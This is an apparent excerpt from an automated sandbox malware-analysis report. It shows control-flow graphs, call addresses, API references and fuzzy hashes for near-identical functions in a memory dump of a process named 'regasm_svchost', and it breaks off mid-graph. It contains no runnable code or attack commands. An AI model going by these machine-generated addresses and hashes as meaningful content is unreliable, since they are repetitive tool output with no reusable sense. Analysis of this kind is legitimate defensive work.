1644->1759 1647 32798b-327bb0 KiUserExceptionDispatcher call 77a668 call 77a968 1812 327bb0 call 77be30 1647->1812 1813 327bb0 call 77be88 1647->1813 1670 327bb6-327bf8 1733 327bf8 call 77c347 1670->1733 1734 327bf8 call 77be30 1670->1734 1735 327bf8 call 77be88 1670->1735 1673 327bfe-327c40 1739 327c40 call 77c3a8 1673->1739 1740 327c40 call 77c408 1673->1740 1676 327c46-327d0c 1752 327d0c call 77ce47 1676->1752 1753 327d0c call 77ca71 1676->1753 1754 327d0c call 77cb20 1676->1754 1755 327d0c call 77cee0 1676->1755 1756 327d0c call 77ce6f 1676->1756 1685 327d12-327d54 1764 327d54 call 77d215 1685->1764 1765 327d54 call 77d230 1685->1765 1688 327d5a-327d9c 1768 327d9c call 77d458 1688->1768 1769 327d9c call 77d4b8 1688->1769 1691 327da2-327de4 1773 327de4 call 77da97 1691->1773 1774 327de4 call 77d9d8 1691->1774 1775 327de4 call 77da38 1691->1775 1694 327dea-327e2c 1779 327e2c call 77dba0 1694->1779 1780 327e2c call 77daf8 1694->1780 1781 327e2c call 77db08 1694->1781 1782 327e2c call 77dbe8 1694->1782 1783 327e2c call 77db98 1694->1783 1697 327e32-327e74 1794 327e74 call 77e116 1697->1794 1795 327e74 call 77e210 1697->1795 1796 327e74 call 77dba0 1697->1796 1797 327e74 call 77de7c 1697->1797 1798 327e74 call 77e168 1697->1798 1799 327e74 call 77e1b8 1697->1799 1800 327e74 call 77daf8 1697->1800 1801 327e74 call 77db08 1697->1801 1802 327e74 call 77dbe8 1697->1802 1803 327e74 call 77db98 1697->1803 1700 327e7a-327f62 1725 327f62 call 77f3c7 1700->1725 1726 327f62 call 77f311 1700->1726 1727 327f62 call 77f1b0 1700->1727 1728 327f62 call 77f270 1700->1728 1729 327f62 call 77f218 1700->1729 1730 327f62 call 77f368 1700->1730 1710 327f68-327ff2 1741 327ff2 call 77f816 1710->1741 1742 327ff2 call 77f878 1710->1742 1716 327ff8-32806a 1750 32806a call 680048 1716->1750 1751 32806a call 680006 1716->1751 1722 328070-3280bf 1725->1710 1726->1710 1727->1710 1728->1710 1729->1710 1730->1710 1731->1596 1732->1596 1733->1673 1734->1673 1735->1673 1736->1635 1737->1635 1738->1635 1739->1676 1740->1676 1741->1716 1742->1716 1743->1602 1744->1602 1745->1602 1746->1644 1747->1644 1748->1644 1749->1644 1750->1722 1751->1722 1752->1685 1753->1685 1754->1685 1755->1685 1756->1685 1757->1647 1758->1647 1759->1647 1760->1611 1761->1611 1762->1611 1763->1611 1764->1688 1765->1688 1766->1614 1767->1614 1768->1691 1769->1691 1771->1617 1772->1617 1773->1694 1774->1694 1775->1694 1777->1620 1778->1620 1779->1697 1780->1697 1781->1697 1782->1697 1783->1697 1784->1584 1785->1584 1786->1584 1787->1584 1788->1584 1789->1584 1790->1584 1791->1584 1792->1623 1793->1623 1794->1700 1795->1700 1796->1700 1797->1700 1798->1700 1799->1700 1800->1700 1801->1700 1802->1700 1803->1700 1804->1626 1805->1626 1806->1593 1807->1593 1808->1593 1809->1593 1810->1593 1811->1593 1812->1670 1813->1670
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: d309c9309853e8c5cb519d9fbb8920841cfb1bba54dddf318b39f3ce9c08bd66
                                                                  • Instruction ID: 8ea1e62394d8a5efabf90c4a0f1cddf24c4b2bfbc433024a6433065cc2f1ffc1
                                                                  • Opcode Fuzzy Hash: d309c9309853e8c5cb519d9fbb8920841cfb1bba54dddf318b39f3ce9c08bd66
                                                                  • Instruction Fuzzy Hash: 3102E938906328CFCB65DF20D898799B7B1BF49305F2089E9D40AA7750DB316E89DF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00327418 Relevance: 1.8, APIs: 1, Instructions: 340COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1814 327418-3274bd 2018 3274bd call 32be80 1814->2018 2019 3274bd call 32c027 1814->2019 2020 3274bd call 32c127 1814->2020 2021 3274bd call 32c068 1814->2021 2022 3274bd call 32c0c8 1814->2022 2023 3274bd call 32be7d 1814->2023 1824 3274c3-327502 2032 327502 call 32c188 1824->2032 2033 327502 call 32c1e8 1824->2033 1827 327508-32758c 1963 32758c call 32dbf3 1827->1963 1964 32758c call 32dca7 1827->1964 1965 32758c call 32dc48 1827->1965 1833 327592-327652 1980 327652 call 32ec30 1833->1980 1981 327652 call 32ed80 1833->1981 1982 327652 call 32ee41 1833->1982 1983 327652 call 32eddf 1833->1983 1842 327658-327697 1986 327697 call 32eea0 1842->1986 1987 327697 call 32ee41 1842->1987 1845 32769d-3276dc 1991 3276dc call 770012 1845->1991 1992 3276dc call 770048 1845->1992 1848 3276e2-327721 1997 327721 call 7712e0 1848->1997 1998 327721 call 771588 1848->1998 1851 327727-327766 2004 327766 call 771c81 1851->2004 2005 327766 call 771d30 1851->2005 1854 32776c-3277ab 2016 3277ab call 771e48 1854->2016 2017 3277ab call 771ef8 1854->2017 1857 3277b1-32787a 1956 32787a call 778270 1857->1956 1957 32787a call 7784e0 1857->1957 1958 32787a call 7785df 1857->1958 1866 327880-327940 1966 327940 call 779c40 1866->1966 1967 327940 call 779ce0 1866->1967 1968 327940 call 779d3f 1866->1968 1969 327940 call 779c38 1866->1969 1875 327946-327985 1977 327985 call 779e00 1875->1977 1978 327985 call 779e5f 1875->1978 1979 327985 call 779da8 1875->1979 1878 32798b-327bb0 KiUserExceptionDispatcher call 77a668 call 77a968 2024 327bb0 call 77be30 1878->2024 2025 327bb0 call 77be88 1878->2025 1901 327bb6-327bf8 2034 327bf8 call 77c347 1901->2034 2035 327bf8 call 77be30 1901->2035 2036 327bf8 call 77be88 1901->2036 1904 327bfe-327c40 1959 327c40 call 77c3a8 1904->1959 1960 327c40 call 77c408 1904->1960 1907 327c46-327d0c 1972 327d0c call 77ce47 1907->1972 1973 327d0c call 77ca71 1907->1973 1974 327d0c call 77cb20 1907->1974 1975 327d0c call 77cee0 1907->1975 1976 327d0c call 77ce6f 1907->1976 1916 327d12-327d54 1984 327d54 call 77d215 1916->1984 1985 327d54 call 77d230 1916->1985 1919 327d5a-327d9c 1988 327d9c call 77d458 1919->1988 1989 327d9c call 77d4b8 1919->1989 1922 327da2-327de4 1993 327de4 call 77da97 1922->1993 1994 327de4 call 77d9d8 1922->1994 1995 327de4 call 77da38 1922->1995 1925 327dea-327e2c 1999 327e2c call 77dba0 1925->1999 2000 327e2c call 77daf8 1925->2000 2001 327e2c call 77db08 1925->2001 2002 327e2c call 77dbe8 1925->2002 2003 327e2c call 77db98 1925->2003 1928 327e32-327e74 2006 327e74 call 77e116 1928->2006 2007 327e74 call 77e210 1928->2007 2008 327e74 call 77dba0 1928->2008 2009 327e74 call 77de7c 1928->2009 2010 327e74 call 77e168 1928->2010 2011 327e74 call 77e1b8 1928->2011 2012 327e74 call 77daf8 1928->2012 2013 327e74 call 77db08 1928->2013 2014 327e74 call 77dbe8 1928->2014 2015 327e74 call 77db98 1928->2015 1931 327e7a-327f62 2026 327f62 call 77f3c7 1931->2026 2027 327f62 call 77f311 1931->2027 2028 327f62 call 77f1b0 1931->2028 2029 327f62 call 77f270 1931->2029 2030 327f62 call 77f218 1931->2030 2031 327f62 call 77f368 1931->2031 1941 327f68-327ff2 1961 327ff2 call 77f816 1941->1961 1962 327ff2 call 77f878 1941->1962 1947 327ff8-32806a 1970 32806a call 680048 1947->1970 1971 32806a call 680006 1947->1971 1953 328070-3280bf 1956->1866 1957->1866 1958->1866 1959->1907 1960->1907 1961->1947 1962->1947 1963->1833 1964->1833 1965->1833 1966->1875 1967->1875 1968->1875 1969->1875 1970->1953 1971->1953 1972->1916 1973->1916 1974->1916 1975->1916 1976->1916 1977->1878 1978->1878 1979->1878 1980->1842 1981->1842 1982->1842 1983->1842 1984->1919 1985->1919 1986->1845 1987->1845 1988->1922 1989->1922 1991->1848 1992->1848 1993->1925 1994->1925 1995->1925 1997->1851 1998->1851 1999->1928 2000->1928 2001->1928 2002->1928 2003->1928 2004->1854 2005->1854 2006->1931 2007->1931 2008->1931 2009->1931 2010->1931 2011->1931 2012->1931 2013->1931 2014->1931 2015->1931 2016->1857 2017->1857 2018->1824 2019->1824 2020->1824 2021->1824 2022->1824 2023->1824 2024->1901 2025->1901 2026->1941 2027->1941 2028->1941 2029->1941 2030->1941 2031->1941 2032->1827 2033->1827 2034->1904 2035->1904 2036->1904
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: d53e1871ff8fc30c849475f265a8dfcf3f1a6d2b7a835ba327fa9d68e4df3a62
                                                                  • Instruction ID: 5bf90aec67f539c505136f0d9522a4c6713822614d46a8ee39d9b49b252dd23f
                                                                  • Opcode Fuzzy Hash: d53e1871ff8fc30c849475f265a8dfcf3f1a6d2b7a835ba327fa9d68e4df3a62
                                                                  • Instruction Fuzzy Hash: BA02E838906328CFCB65DF24D898799B7B1BF49306F2089D9D40AA7750DB316E89DF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0032745D Relevance: 1.8, APIs: 1, Instructions: 331COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2037 32745d-3274bd 2243 3274bd call 32be80 2037->2243 2244 3274bd call 32c027 2037->2244 2245 3274bd call 32c127 2037->2245 2246 3274bd call 32c068 2037->2246 2247 3274bd call 32c0c8 2037->2247 2248 3274bd call 32be7d 2037->2248 2044 3274c3-327502 2176 327502 call 32c188 2044->2176 2177 327502 call 32c1e8 2044->2177 2047 327508-32758c 2188 32758c call 32dbf3 2047->2188 2189 32758c call 32dca7 2047->2189 2190 32758c call 32dc48 2047->2190 2053 327592-327652 2205 327652 call 32ec30 2053->2205 2206 327652 call 32ed80 2053->2206 2207 327652 call 32ee41 2053->2207 2208 327652 call 32eddf 2053->2208 2062 327658-327697 2211 327697 call 32eea0 2062->2211 2212 327697 call 32ee41 2062->2212 2065 32769d-3276dc 2216 3276dc call 770012 2065->2216 2217 3276dc call 770048 2065->2217 2068 3276e2-327721 2222 327721 call 7712e0 2068->2222 2223 327721 call 771588 2068->2223 2071 327727-327766 2229 327766 call 771c81 2071->2229 2230 327766 call 771d30 2071->2230 2074 32776c-3277ab 2241 3277ab call 771e48 2074->2241 2242 3277ab call 771ef8 2074->2242 2077 3277b1-32787a 2181 32787a call 778270 2077->2181 2182 32787a call 7784e0 2077->2182 2183 32787a call 7785df 2077->2183 2086 327880-327940 2191 327940 call 779c40 2086->2191 2192 327940 call 779ce0 2086->2192 2193 327940 call 779d3f 2086->2193 2194 327940 call 779c38 2086->2194 2095 327946-327985 2202 327985 call 779e00 2095->2202 2203 327985 call 779e5f 2095->2203 2204 327985 call 779da8 2095->2204 2098 32798b-327bb0 KiUserExceptionDispatcher call 77a668 call 77a968 2249 327bb0 call 77be30 2098->2249 2250 327bb0 call 77be88 2098->2250 2121 327bb6-327bf8 2178 327bf8 call 77c347 2121->2178 2179 327bf8 call 77be30 2121->2179 2180 327bf8 call 77be88 2121->2180 2124 327bfe-327c40 2184 327c40 call 77c3a8 2124->2184 2185 327c40 call 77c408 2124->2185 2127 327c46-327d0c 2197 327d0c call 77ce47 2127->2197 2198 327d0c call 77ca71 2127->2198 2199 327d0c call 77cb20 2127->2199 2200 327d0c call 77cee0 2127->2200 2201 327d0c call 77ce6f 2127->2201 2136 327d12-327d54 2209 327d54 call 77d215 2136->2209 2210 327d54 call 77d230 2136->2210 2139 327d5a-327d9c 2213 327d9c call 77d458 2139->2213 2214 327d9c call 77d4b8 2139->2214 2142 327da2-327de4 2218 327de4 call 77da97 2142->2218 2219 327de4 call 77d9d8 2142->2219 2220 327de4 call 77da38 2142->2220 2145 327dea-327e2c 2224 327e2c call 77dba0 2145->2224 2225 327e2c call 77daf8 2145->2225 2226 327e2c call 77db08 2145->2226 2227 327e2c call 77dbe8 2145->2227 2228 327e2c call 77db98 2145->2228 2148 327e32-327e74 2231 327e74 call 77e116 2148->2231 2232 327e74 call 77e210 2148->2232 2233 327e74 call 77dba0 2148->2233 2234 327e74 call 77de7c 2148->2234 2235 327e74 call 77e168 2148->2235 2236 327e74 call 77e1b8 2148->2236 2237 327e74 call 77daf8 2148->2237 2238 327e74 call 77db08 2148->2238 2239 327e74 call 77dbe8 2148->2239 2240 327e74 call 77db98 2148->2240 2151 327e7a-327f62 2251 327f62 call 77f3c7 2151->2251 2252 327f62 call 77f311 2151->2252 2253 327f62 call 77f1b0 2151->2253 2254 327f62 call 77f270 2151->2254 2255 327f62 call 77f218 2151->2255 2256 327f62 call 77f368 2151->2256 2161 327f68-327ff2 2186 327ff2 call 77f816 2161->2186 2187 327ff2 call 77f878 2161->2187 2167 327ff8-32806a 2195 32806a call 680048 2167->2195 2196 32806a call 680006 2167->2196 2173 328070-3280bf 2176->2047 2177->2047 2178->2124 2179->2124 2180->2124 2181->2086 2182->2086 2183->2086 2184->2127 2185->2127 2186->2167 2187->2167 2188->2053 2189->2053 2190->2053 2191->2095 2192->2095 2193->2095 2194->2095 2195->2173 2196->2173 2197->2136 2198->2136 2199->2136 2200->2136 2201->2136 2202->2098 2203->2098 2204->2098 2205->2062 2206->2062 2207->2062 2208->2062 2209->2139 2210->2139 2211->2065 2212->2065 2213->2142 2214->2142 2216->2068 2217->2068 2218->2145 2219->2145 2220->2145 2222->2071 2223->2071 2224->2148 2225->2148 2226->2148 2227->2148 2228->2148 2229->2074 2230->2074 2231->2151 2232->2151 2233->2151 2234->2151 2235->2151 2236->2151 2237->2151 2238->2151 2239->2151 2240->2151 2241->2077 2242->2077 2243->2044 2244->2044 2245->2044 2246->2044 2247->2044 2248->2044 2249->2121 2250->2121 2251->2161 2252->2161 2253->2161 2254->2161 2255->2161 2256->2161
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: c21e6e2bbb3c8c92055382f5b1c3136649317503056e61124aa1b6d8d50f20f0
                                                                  • Instruction ID: c642940f23aa22733f5c55cdfeb2650db31099a87b18509cba1432d8f254588a
                                                                  • Opcode Fuzzy Hash: c21e6e2bbb3c8c92055382f5b1c3136649317503056e61124aa1b6d8d50f20f0
                                                                  • Instruction Fuzzy Hash: FF02E838906328CFCB65DF20D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00327499 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2257 327499-3274bd 2393 3274bd call 32be80 2257->2393 2394 3274bd call 32c027 2257->2394 2395 3274bd call 32c127 2257->2395 2396 3274bd call 32c068 2257->2396 2397 3274bd call 32c0c8 2257->2397 2398 3274bd call 32be7d 2257->2398 2261 3274c3-327502 2407 327502 call 32c188 2261->2407 2408 327502 call 32c1e8 2261->2408 2264 327508-32758c 2419 32758c call 32dbf3 2264->2419 2420 32758c call 32dca7 2264->2420 2421 32758c call 32dc48 2264->2421 2270 327592-327652 2436 327652 call 32ec30 2270->2436 2437 327652 call 32ed80 2270->2437 2438 327652 call 32ee41 2270->2438 2439 327652 call 32eddf 2270->2439 2279 327658-327697 2442 327697 call 32eea0 2279->2442 2443 327697 call 32ee41 2279->2443 2282 32769d-3276dc 2447 3276dc call 770012 2282->2447 2448 3276dc call 770048 2282->2448 2285 3276e2-327721 2453 327721 call 7712e0 2285->2453 2454 327721 call 771588 2285->2454 2288 327727-327766 2460 327766 call 771c81 2288->2460 2461 327766 call 771d30 2288->2461 2291 32776c-3277ab 2472 3277ab call 771e48 2291->2472 2473 3277ab call 771ef8 2291->2473 2294 3277b1-32787a 2412 32787a call 778270 2294->2412 2413 32787a call 7784e0 2294->2413 2414 32787a call 7785df 2294->2414 2303 327880-327940 2422 327940 call 779c40 2303->2422 2423 327940 call 779ce0 2303->2423 2424 327940 call 779d3f 2303->2424 2425 327940 call 779c38 2303->2425 2312 327946-327985 2433 327985 call 779e00 2312->2433 2434 327985 call 779e5f 2312->2434 2435 327985 call 779da8 2312->2435 2315 32798b-327bb0 KiUserExceptionDispatcher call 77a668 call 77a968 2399 327bb0 call 77be30 2315->2399 2400 327bb0 call 77be88 2315->2400 2338 327bb6-327bf8 2409 327bf8 call 77c347 2338->2409 2410 327bf8 call 77be30 2338->2410 2411 327bf8 call 77be88 2338->2411 2341 327bfe-327c40 2415 327c40 call 77c3a8 2341->2415 2416 327c40 call 77c408 2341->2416 2344 327c46-327d0c 2428 327d0c call 77ce47 2344->2428 2429 327d0c call 77ca71 2344->2429 2430 327d0c call 77cb20 2344->2430 2431 327d0c call 77cee0 2344->2431 2432 327d0c call 77ce6f 2344->2432 2353 327d12-327d54 2440 327d54 call 77d215 2353->2440 2441 327d54 call 77d230 2353->2441 2356 327d5a-327d9c 2444 327d9c call 77d458 2356->2444 2445 327d9c call 77d4b8 2356->2445 2359 327da2-327de4 2449 327de4 call 77da97 2359->2449 2450 327de4 call 77d9d8 2359->2450 2451 327de4 call 77da38 2359->2451 2362 327dea-327e2c 2455 327e2c call 77dba0 2362->2455 2456 327e2c call 77daf8 2362->2456 2457 327e2c call 77db08 2362->2457 2458 327e2c call 77dbe8 2362->2458 2459 327e2c call 77db98 2362->2459 2365 327e32-327e74 2462 327e74 call 77e116 2365->2462 2463 327e74 call 77e210 2365->2463 2464 327e74 call 77dba0 2365->2464 2465 327e74 call 77de7c 2365->2465 2466 327e74 call 77e168 2365->2466 2467 327e74 call 77e1b8 2365->2467 2468 327e74 call 77daf8 2365->2468 2469 327e74 call 77db08 2365->2469 2470 327e74 call 77dbe8 2365->2470 2471 327e74 call 77db98 2365->2471 2368 327e7a-327f62 2401 327f62 call 77f3c7 2368->2401 2402 327f62 call 77f311 2368->2402 2403 327f62 call 77f1b0 2368->2403 2404 327f62 call 77f270 2368->2404 2405 327f62 call 77f218 2368->2405 2406 327f62 call 77f368 2368->2406 2378 327f68-327ff2 2417 327ff2 call 77f816 2378->2417 2418 327ff2 call 77f878 2378->2418 2384 327ff8-32806a 2426 32806a call 680048 2384->2426 2427 32806a call 680006 2384->2427 2390 328070-3280bf 2393->2261 2394->2261 2395->2261 2396->2261 2397->2261 2398->2261 2399->2338 2400->2338 2401->2378 2402->2378 2403->2378 2404->2378 2405->2378 2406->2378 2407->2264 2408->2264 2409->2341 2410->2341 2411->2341 2412->2303 2413->2303 2414->2303 2415->2344 2416->2344 2417->2384 2418->2384 2419->2270 2420->2270 2421->2270 2422->2312 2423->2312 2424->2312 2425->2312 2426->2390 2427->2390 2428->2353 2429->2353 2430->2353 2431->2353 2432->2353 2433->2315 2434->2315 2435->2315 2436->2279 2437->2279 2438->2279 2439->2279 2440->2356 2441->2356 2442->2282 2443->2282 2444->2359 2445->2359 2447->2285 2448->2285 2449->2362 2450->2362 2451->2362 2453->2288 2454->2288 2455->2365 2456->2365 2457->2365 2458->2365 2459->2365 2460->2291 2461->2291 2462->2368 2463->2368 2464->2368 2465->2368 2466->2368 2467->2368 2468->2368 2469->2368 2470->2368 2471->2368 2472->2294 2473->2294
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: 65240b6bc1ca3e634b57b17fe3652c7219a48b1241161dc787949804441f96c8
                                                                  • Instruction ID: 7100cb200b133adb3f8fa666a6c4829b27c1c4168c858dd20becb305a8e23cbd
                                                                  • Opcode Fuzzy Hash: 65240b6bc1ca3e634b57b17fe3652c7219a48b1241161dc787949804441f96c8
                                                                  • Instruction Fuzzy Hash: 5702D738906328CFCB65DF24D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 003274DE Relevance: 1.8, APIs: 1, Instructions: 319COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2474 3274de-327502 2667 327502 call 32c188 2474->2667 2668 327502 call 32c1e8 2474->2668 2478 327508-32758c 2679 32758c call 32dbf3 2478->2679 2680 32758c call 32dca7 2478->2680 2681 32758c call 32dc48 2478->2681 2484 327592-327652 2621 327652 call 32ec30 2484->2621 2622 327652 call 32ed80 2484->2622 2623 327652 call 32ee41 2484->2623 2624 327652 call 32eddf 2484->2624 2493 327658-327697 2627 327697 call 32eea0 2493->2627 2628 327697 call 32ee41 2493->2628 2496 32769d-3276dc 2632 3276dc call 770012 2496->2632 2633 3276dc call 770048 2496->2633 2499 3276e2-327721 2638 327721 call 7712e0 2499->2638 2639 327721 call 771588 2499->2639 2502 327727-327766 2645 327766 call 771c81 2502->2645 2646 327766 call 771d30 2502->2646 2505 32776c-3277ab 2657 3277ab call 771e48 2505->2657 2658 3277ab call 771ef8 2505->2658 2508 3277b1-32787a 2672 32787a call 778270 2508->2672 2673 32787a call 7784e0 2508->2673 2674 32787a call 7785df 2508->2674 2517 327880-327940 2607 327940 call 779c40 2517->2607 2608 327940 call 779ce0 2517->2608 2609 327940 call 779d3f 2517->2609 2610 327940 call 779c38 2517->2610 2526 327946-327985 2618 327985 call 779e00 2526->2618 2619 327985 call 779e5f 2526->2619 2620 327985 call 779da8 2526->2620 2529 32798b-327bb0 KiUserExceptionDispatcher call 77a668 call 77a968 2659 327bb0 call 77be30 2529->2659 2660 327bb0 call 77be88 2529->2660 2552 327bb6-327bf8 2669 327bf8 call 77c347 2552->2669 2670 327bf8 call 77be30 2552->2670 2671 327bf8 call 77be88 2552->2671 2555 327bfe-327c40 2675 327c40 call 77c3a8 2555->2675 2676 327c40 call 77c408 2555->2676 2558 327c46-327d0c 2613 327d0c call 77ce47 2558->2613 2614 327d0c call 77ca71 2558->2614 2615 327d0c call 77cb20 2558->2615 2616 327d0c call 77cee0 2558->2616 2617 327d0c call 77ce6f 2558->2617 2567 327d12-327d54 2625 327d54 call 77d215 2567->2625 2626 327d54 call 77d230 2567->2626 2570 327d5a-327d9c 2629 327d9c call 77d458 2570->2629 2630 327d9c call 77d4b8 2570->2630 2573 327da2-327de4 2634 327de4 call 77da97 2573->2634 2635 327de4 call 77d9d8 2573->2635 2636 327de4 call 77da38 2573->2636 2576 327dea-327e2c 2640 327e2c call 77dba0 2576->2640 2641 327e2c call 77daf8 2576->2641 2642 327e2c call 77db08 2576->2642 2643 327e2c call 77dbe8 2576->2643 2644 327e2c call 77db98 2576->2644 2579 327e32-327e74 2647 327e74 call 77e116 2579->2647 2648 327e74 call 77e210 2579->2648 2649 327e74 call 77dba0 2579->2649 2650 327e74 call 77de7c 2579->2650 2651 327e74 call 77e168 2579->2651 2652 327e74 call 77e1b8 2579->2652 2653 327e74 call 77daf8 2579->2653 2654 327e74 call 77db08 2579->2654 2655 327e74 call 77dbe8 2579->2655 2656 327e74 call 77db98 2579->2656 2582 327e7a-327f62 2661 327f62 call 77f3c7 2582->2661 2662 327f62 call 77f311 2582->2662 2663 327f62 call 77f1b0 2582->2663 2664 327f62 call 77f270 2582->2664 2665 327f62 call 77f218 2582->2665 2666 327f62 call 77f368 2582->2666 2592 327f68-327ff2 2677 327ff2 call 77f816 2592->2677 2678 327ff2 call 77f878 2592->2678 2598 327ff8-32806a 2611 32806a call 680048 2598->2611 2612 32806a call 680006 2598->2612 2604 328070-3280bf 2607->2526 2608->2526 2609->2526 2610->2526 2611->2604 2612->2604 2613->2567 2614->2567 2615->2567 2616->2567 2617->2567 2618->2529 2619->2529 2620->2529 2621->2493 2622->2493 2623->2493 2624->2493 2625->2570 2626->2570 2627->2496 2628->2496 2629->2573 2630->2573 2632->2499 2633->2499 2634->2576 2635->2576 2636->2576 2638->2502 2639->2502 2640->2579 2641->2579 2642->2579 2643->2579 2644->2579 2645->2505 2646->2505 2647->2582 2648->2582 2649->2582 2650->2582 2651->2582 2652->2582 2653->2582 2654->2582 2655->2582 2656->2582 2657->2508 2658->2508 2659->2552 2660->2552 2661->2592 2662->2592 2663->2592 2664->2592 2665->2592 2666->2592 2667->2478 2668->2478 2669->2555 2670->2555 2671->2555 2672->2517 2673->2517 2674->2517 2675->2558 2676->2558 2677->2598 2678->2598 2679->2484 2680->2484 2681->2484
                                                                  APIs
                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00327A0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1168161154.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_320000_regasm_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: DispatcherExceptionUser
                                                                  • String ID:
                                                                  • API String ID: 6842923-0
                                                                  • Opcode ID: aad9bd099f4da9917336b34ad9f018af5ab1c0effe97995f261be64054a5ffcb
                                                                  • Instruction ID: 6dfd6201207d557f2aa2b3b187f8fbe2836de68fbac9119d752c126af85ec6cf
                                                                  • Opcode Fuzzy Hash: aad9bd099f4da9917336b34ad9f018af5ab1c0effe97995f261be64054a5ffcb
                                                                  • Instruction Fuzzy Hash: 9CF1D638906328CFCB65DF24D898799B7B1BF49306F2089D9D40AA7750DB316E8ADF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00327523 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2682 327523-32758c 2858 32758c call 32dbf3 2682->2858 2859 32758c call 32dca7 2682->2859 2860 32758c call 32dc48 2682->2860 2689 327592-327652 2875 327652 call 32ec30 2689->2875 2876 327652 call 32ed80 2689->2876 2877 327652 call 32ee41 2689->2877 2878 327652 call 32eddf 2689->2878 2698 327658-327697 2881 327697 call 32eea0 2698->2881 2882 327697 call 32ee41 2698->2882 2701 32769d-3276dc 2813 3276dc call 770012 2701->2813 2814 3276dc call 770048 2701->2814 2704 3276e2-327721 2819 327721 call 7712e0 2704->2819 2820 327721 call 771588 2704->2820 2707 327727-327766 2826 327766 call 771c81 2707->2826 2827 327766 call 771d30 2707->2827 2710 32776c-3277ab 2838 3277ab call 771e48 2710->2838 2839 3277ab call 771ef8 2710->2839 2713 3277b1-32787a 2851 32787a call 778270 2713->2851 2852 32787a call 7784e0 2713->2852 2853 32787a call 7785df 2713->2853 2722 327880-327940 2861 327940 call 779c40 2722->2861 2862 327940 call 779ce0 2722->2862 2863 327940 call 779d3f 2722->2863 2864 327940 call 779c38 2722->2864 2731 327946-327985 2872 327985 call 779e00 2731->2872 2873 327985 call 779e5f 2731->2873 2874 327985 call 779da8 2731->2874 2734 32798b-327bb0 KiUserExceptionDispatcher call 77a668 call 77a968 2840 327bb0 call 77be30 2734->2840 2841 327bb0 call 77be88 2734->2841 2757 327bb6-327bf8 2848 327bf8 call 77c347 2757->2848 2849 327bf8 call 77be30 2757->2849 2850 327bf8 call 77be88 2757->2850 2760 327bfe-327c40 2854 327c40 call 77c3a8 2760->2854 2855 327c40 call 77c408 2760->2855 2763 327c46-327d0c 2867 327d0c call 77ce47 2763->2867 2868 327d0c call 77ca71 2763->2868 2869 327d0c call 77cb20 2763->2869 2870 327d0c call 77cee0 2763->2870 2871 327d0c call 77ce6f 2763->2871 2772 327d12-327d54 2879 327d54 call 77d215 2772->2879 2880 327d54 call 77d230 2772->2880 2775 327d5a-327d9c 2883 327d9c call 77d458 2775->2883 2884 327d9c call 77d4b8 2775->2884 2778 327da2-327de4 2815 327de4 call 77da97 2778->2815 2816 327de4 call 77d9d8 2778->2816 2817 327de4 call 77da38 2778->2817 2781 327dea-327e2c 2821 327e2c call 77dba0 2781->2821 2822 327e2c call 77daf8 2781->2822 2823 327e2c call 77db08 2781->2823 2824 327e2c call 77dbe8 2781->2824 2825 327e2c call 77db98 2781->2825 2784 327e32-327e74 2828 327e74 call 77e116 2784->2828 2829 327e74 call 77e210 